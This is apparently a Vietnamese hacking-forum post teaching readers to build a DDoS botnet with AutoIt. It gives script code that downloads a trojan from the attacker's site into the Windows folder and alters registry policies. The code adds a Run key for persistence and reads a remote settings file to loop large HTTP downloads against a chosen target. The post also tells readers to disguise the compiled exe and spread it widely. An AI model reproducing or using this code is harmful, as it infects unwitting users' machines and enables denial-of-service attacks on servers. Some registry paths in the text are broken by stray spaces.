Source AutoIT 3
http://www.4shared.com/file/55243733...6f/AutoIT.html
Nếu 1 website bảo mật wá , bạn úynh ko đc nó
, cũng không đụng đc tới web server của nó th́ chúng ta chơi chiêu bài cuối , không ăn được là đạp.
Tấn công từ chối dịch vụ DOS : Denial Of Service . ko chiếm quyền điều khiển mà mục đích là làm cho dich vụ đối phương cung cấp bị tê liệt .
DDOS : Distribute Denial Of Service : Tấn công từ chối dịch vụ phân tán , sử dụng hệ thống mạng botnet để tấn công .
Botnet : Hệ thống các máy tính zombie bị lây nhiễm các trojan , khi nhận lệnh của ta sẽ đồng loạt tấn công .
Sau đây là 1 cách DDOS thông qua HTTP Get , không ghê gớm lắm nhưng cũng làm đc khối tên ói máu nếu mạng botnet của bạn lớn
- Download và Cài AutoIT
- Tạo file script sau
- Compile thành file exe
- Tạo 1 website của bạn , upload file exe lên với tên trojan.txt
- Nhúng trojan này vào 1 cái ǵ đó hấp dẫn và quăng toán loạn
$website = "http://yourdomain/"
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\sysinet.exe") Then
InetGet ($website & "/trojan.txt", @WindowsDir & "\sysinet.exe", 0, 1)
Sleep(5000)
EndIf
Đoạn mă trên để download trojan về máy nạn nhân , và rename lại thành
; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",
"0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",
"0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website)
Đoạn trên tạo các giá trị tự động chạy cho trojan sysinet.exe . Disable
taskmanager và regedit của đối tượng
Ở đây ḿnh set là 0 v́ làm phiền đối tượng nó cáu cài lại máy th́ phiền
. Ḿnh chỉ mượn tay
nó đánh phụ thoy , nên tử tế chút
Code:
InetGet ($website & "/setting.txt", @WindowsDir & "\setting.txt", 0, 1)
Sleep(5000)
$taptinmoi = FileOpen(@WindowsDir & "\setting.txt", 0)
$sitetancong = FileReadLine($taptinmoi)
$thoigian = FileReadLine($taptinmoi)
FileClose($taptinmoi)
while(1)
InetGet ($sitetancong, @windowsDir , 0, 1)
sleep($thoigian)
wend
Đoạn này sẽ đọc file settings trên web site của bạn và bắt đầu download dữ liệu từ server về
file setting.txt đặt trên
http://yourdomain/
và có nội dụng như sau
ḍng 1 : link direct tới file cần download
ḍng 2 : thời gian ngủ mỗi lần download
-----------------------------------------------------------------------
ví dụ :
<< link direct . file size= 300 mb
300000 << v́ file bự , cho ngủ 5 phút .
-----------------------------------------------------------------------
Chỉ cần khoảng vài trăm mạng cùng down bộ phim này th́ cái server sẽ ra sao nhỉ
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\sysinet.exe")
file .exe để có khả năng thực thi. [ tại host free ko cho up exe
Thực tập DDOS thông qua HTTP GET
Linear Mode
